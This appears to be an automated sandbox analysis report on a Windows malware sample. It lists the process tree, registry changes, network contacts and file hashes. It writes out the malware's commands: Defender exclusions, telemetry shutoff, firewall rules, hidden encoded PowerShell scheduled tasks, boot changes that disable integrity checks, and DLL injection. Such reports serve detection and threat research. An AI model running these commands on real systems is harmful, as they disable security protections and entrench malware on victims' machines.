| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\9WeXljfUZ79vrcuk6JsMXzJp.exe
"C:\Users\Admin\Pictures\9WeXljfUZ79vrcuk6JsMXzJp.exe"
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
"C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe"
C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
"C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe"
C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
"C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe"
C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240328021935.log C:\Windows\Logs\CBS\CbsPersist_20240328021935.cab
C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe
"C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe"
C:\Users\Admin\Pictures\C69V4HOBgfVrh5iaLMXz8vg9.exe
"C:\Users\Admin\Pictures\C69V4HOBgfVrh5iaLMXz8vg9.exe"
C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe"
C:\Users\Admin\AppData\Local\Temp\7zS6E0F.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\gTpKWIirwoJXbhyuKZKPoyvI.exe
"C:\Users\Admin\Pictures\gTpKWIirwoJXbhyuKZKPoyvI.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7899.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
"C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
"C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe"
C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
"C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe"
C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe
"C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsWCAzaZg" /SC once /ST 00:00:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmOoiYpFB" /SC once /ST 01:03:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsWCAzaZg"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmOoiYpFB"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {791434CA-9BD5-46D0-9F35-B0B5813A86CB} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsWCAzaZg"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21095658774178971377396183983929217012123689365-831397659929063165409336297"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmOoiYpFB"
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe
"C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\KQSVjie.exe\" id /NWsite_idxoz 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 02:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\DCLNGyf.exe\" id /Pxsite_idYFS 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DBKFIDAAEH.exe
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1568846536-2115391832831922554-394445826-2010898833-88320264-1151140595-1460602350"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9180188102057878665106981987417379633054467495152788509991045609518-2139180974"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-95711784-65960448685985863-8988650449687538311357155801-419907471845409676"
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mihomeme.info | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | operandotwo.com | udp |
| US | 8.8.8.8:53 | shipofdestiny.com | udp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 104.21.32.142:443 | shipofdestiny.com | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| IE | 38.180.21.119:80 | mihomeme.info | tcp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.200.219:443 | sty.ink | tcp |
| US | 172.67.160.247:443 | operandotwo.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| US | 8.8.8.8:53 | d.392391234.xyz | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | lawyerbuyer.org | udp |
| US | 104.21.63.71:443 | lawyerbuyer.org | tcp |
| US | 8.8.8.8:53 | guseman.org | udp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 172.67.170.65:443 | lawyerbuyer.org | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.144:80 | tcp | |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| US | 46.226.167.187:80 | 46.226.167.187 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 25f404ab-b513-4fe5-ba0d-541e946e4bd4.uuid.filesdumpplace.org | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server10.filesdumpplace.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| BG | 185.82.216.96:443 | server10.filesdumpplace.org | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| GB | 142.251.29.127:19302 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| BG | 185.82.216.96:443 | server10.filesdumpplace.org | tcp |
Files
memory/1260-0-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-2-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-6-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1260-9-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-11-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1260-13-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar370F.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3fd2edfba705634e0a2efd9590efebbf |
| SHA1 | 210a16f160e21430b7ced9b64d569a9f4a687949 |
| SHA256 | 128ecb3d5d37f8819637e3dda0cb232e5d7c8aa070471d85dc94900d664dba7e |
| SHA512 | 4a79f69f9f70b43206e3e2aff55d1beadf2d4c1924c50552dcc3e18dd98172565433e46cf9bfa830aa11df122f591caaaa5b75f7cafece6d649597eeffb89855 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aed10075d68ae6998ff64914966b11a7 |
| SHA1 | 56dd59d0e92047aa49b8de29bae5f875bf439538 |
